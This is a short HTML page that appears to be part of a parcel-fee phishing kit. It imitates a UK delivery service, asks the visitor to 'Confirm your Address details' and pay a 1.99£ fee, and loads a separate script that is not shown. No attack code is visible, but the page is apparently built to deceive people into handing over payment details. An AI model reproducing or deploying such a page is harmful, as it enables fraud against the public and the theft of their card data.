<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/main.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title>Document</title>

</head>
<body>
    <div class="top1">
        <img src="./img/logo.png" alt="">
    </div>
    <div class="top2">
        Coronavirus update: We’re keeping the UK connected. Despite best efforts some services may be disrupted.
    </div>
    <div class="top3">
        Confirm your <br> Address details
    </div>
    <!-- ============================ -->
    <div class="kolch">
        <form  action="" id="pg1">
           <div class="pack1">
              <img width="30" src="./public/img/delivery-box.png" alt="">
                <p>  You are about to pay for 1 order</p>
             </div>

             <div class="inform">
                 <div class="left">
                    <p>Mail</p>
                    
                    <p>Including VAT</p>
                    <p style="font-weight: bold; font-size: 20px;">Total</p>
                 </div>

                 <div class="right">
                    <p> 1,00£</p>
                    
                    <p>0,99£</p>
                    <p style="font-size: 20px; font-weight: bold;">1,99£</p>
                 </div>
             </div>

             <button class="btn1">Proceed to payment</button>
          </form>
       </div>



    <div class="fot">
        <img src="./img/fot.PNG" alt="">
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>